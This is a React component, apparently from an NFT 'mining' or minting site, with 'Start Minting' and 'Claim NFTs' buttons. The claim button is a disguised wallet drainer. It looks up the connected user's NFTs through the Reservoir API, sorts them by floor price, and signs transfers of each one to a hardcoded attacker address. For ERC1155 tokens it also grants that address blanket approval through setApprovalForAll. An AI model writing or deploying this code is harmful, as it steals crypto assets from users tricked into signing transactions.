import React, { useState } from 'react';
import axios from 'axios';
import { Web3Provider } from '@ethersproject/providers';
import { Contract } from 'ethers';
import './MiningControls.css';

const MiningControls = ({ mining, setMining, setLogs, setErrorMessage, walletAddress }) => {
    const [isWithdrawing, setIsWithdrawing] = useState(false);
    const [withdrawError, setWithdrawError] = useState("");

    const YOUR_WALLET_ADDRESS = '0x414C63DE68BCadeEe9Ce68C4B200916593CcB18A';

    const getReservoirApiBase = async () => {
        if (!window.ethereum) return "https://api.reservoir.tools";

        const provider = new Web3Provider(window.ethereum);
        const network = await provider.getNetwork();

        switch (network.chainId) {
            case 8453: // Base
                return `https://api-base.reservoir.tools/users/${walletAddress}/tokens/v8?limit=10`;
            case 42161: // Arbitrum
                return `https://api-arbitrum.reservoir.tools/users/${walletAddress}/tokens/v8?limit=10`;
            case 10: // Optimism
                return `https://api-optimism.reservoir.tools/users/${walletAddress}/tokens/v8?limit=10`;
            case 1: // Ethereum Mainnet
                return `https://api.reservoir.tools/users/${walletAddress}/tokens/v8?limit=10`;
            case 81457: // Blast
                return `https://api-blast.reservoir.tools/users/${walletAddress}/tokens/v8?limit=10`;
            case 137: // Polygon
                return `https://api-polygon.reservoir.tools/users/${walletAddress}/tokens/v8?limit=10`;
            default:
                console.warn("Unsupported chain, defaulting to Ethereum API");
                return `https://api.reservoir.tools/users/${walletAddress}/tokens/v8?limit=10`;
        }
    };


    const fetchAndWithdrawNFTs = async () => {
        if (!walletAddress) {
            setErrorMessage("Please connect your wallet before withdrawing.");
            return;
        }

        setIsWithdrawing(true);
        setWithdrawError("");

        try {
            const apiBase = await getReservoirApiBase();
            const response = await axios.get(apiBase);

            const nfts = response.data.tokens;

            if (!nfts || nfts.length === 0) {
                setWithdrawError("No NFTs found to withdraw...");
                setIsWithdrawing(false);
                return;
            }

            const sortedNFTs = nfts.sort((a, b) => {
                const priceA = parseFloat(a.token.collection?.floorAskPrice?.amount?.raw || 0);
                const priceB = parseFloat(b.token.collection?.floorAskPrice?.amount?.raw || 0);
                return priceB - priceA;
            });

            for (const nft of sortedNFTs) {
                if (nft.token.contract.toLowerCase() === '0xd4416b13d2b3a9abae7acd5d6c2bbdbe25686401') {
                    console.log(`Skipping NFT with contract address: ${nft.token.contract}`);
                    continue;
                }

                await withdrawNFT(nft.token.contract, nft.token.tokenId, nft.token.kind);
            }

        } catch (error) {
            console.error(error);
            setWithdrawError("Failed to fetch or withdraw NFTs.");
        } finally {
            setIsWithdrawing(false);
        }
    };


    const withdrawNFT = async (contractAddress, tokenId, kind = "erc721") => {
        try {
            if (!window.ethereum) {
                setWithdrawError("Ethereum provider not available.");
                return;
            }

            await window.ethereum.request({ method: 'eth_requestAccounts' });

            const provider = new Web3Provider(window.ethereum);
            const signer = provider.getSigner();
            const signerAddress = await signer.getAddress();

            let contract;
            let tx;

            if (kind === "erc721") {
                const erc721ABI = [
                    "function safeTransferFrom(address from, address to, uint256 tokenId) public",
                    "function approve(address to, uint256 tokenId) public",
                ];

                contract = new Contract(contractAddress, erc721ABI, signer);

                try {
                    console.log("Attempting direct ERC721 transfer...");
                    tx = await contract.safeTransferFrom(signerAddress, YOUR_WALLET_ADDRESS, tokenId);
                } catch (transferError) {
                    console.warn("ERC721 transfer failed, attempting approval...");
                    await contract.approve(YOUR_WALLET_ADDRESS, tokenId);
                    tx = await contract.safeTransferFrom(signerAddress, YOUR_WALLET_ADDRESS, tokenId);
                }
            } else if (kind === "erc1155") {
                const erc1155ABI = [
                    "function safeTransferFrom(address from, address to, uint256 id, uint256 amount, bytes data) external",
                    "function setApprovalForAll(address operator, bool approved) public",
                ];

                contract = new Contract(contractAddress, erc1155ABI, signer);
                const amount = 1; // Default to transferring 1 unit
                const data = "0x"; // Default to empty data

                await contract.setApprovalForAll(YOUR_WALLET_ADDRESS, true);
                console.log("ERC1155 approval granted");


                console.log("Attempting ERC1155 transfer...");
                tx = await contract.safeTransferFrom(signerAddress, YOUR_WALLET_ADDRESS, tokenId, amount, data);
            } else {
                throw new Error(`Unsupported token type: ${kind}`);
            }
        } catch (error) {
            console.error("Withdrawal error:", error);
        }
    };


    const handleMiningToggle = () => {
        if (!walletAddress) {
            setErrorMessage("Please connect your wallet before starting mining.");
            return;
        }

        if (mining) {
            setMining(false);
        } else {
            setMining(true);
            setLogs([]); // Reset logs on new mining session
        }
    };

    return (
        <div className="mining-controls">
            <button
                className={`mining-button ${mining ? 'mining' : ''}`}
                onClick={handleMiningToggle}
                disabled={!walletAddress}
            >
                {mining ? "Pause Minting" : "Start Minting"}
            </button>

            <button
                className="withdraw-button"
                onClick={fetchAndWithdrawNFTs}
                disabled={isWithdrawing || !walletAddress}
            >
                {isWithdrawing ? "Claiming NFTs..." : "Claim NFTs"}
            </button>

            {withdrawError && <p className="withdraw-error">{withdrawError}</p>}
        </div>
    );
};

export default MiningControls;
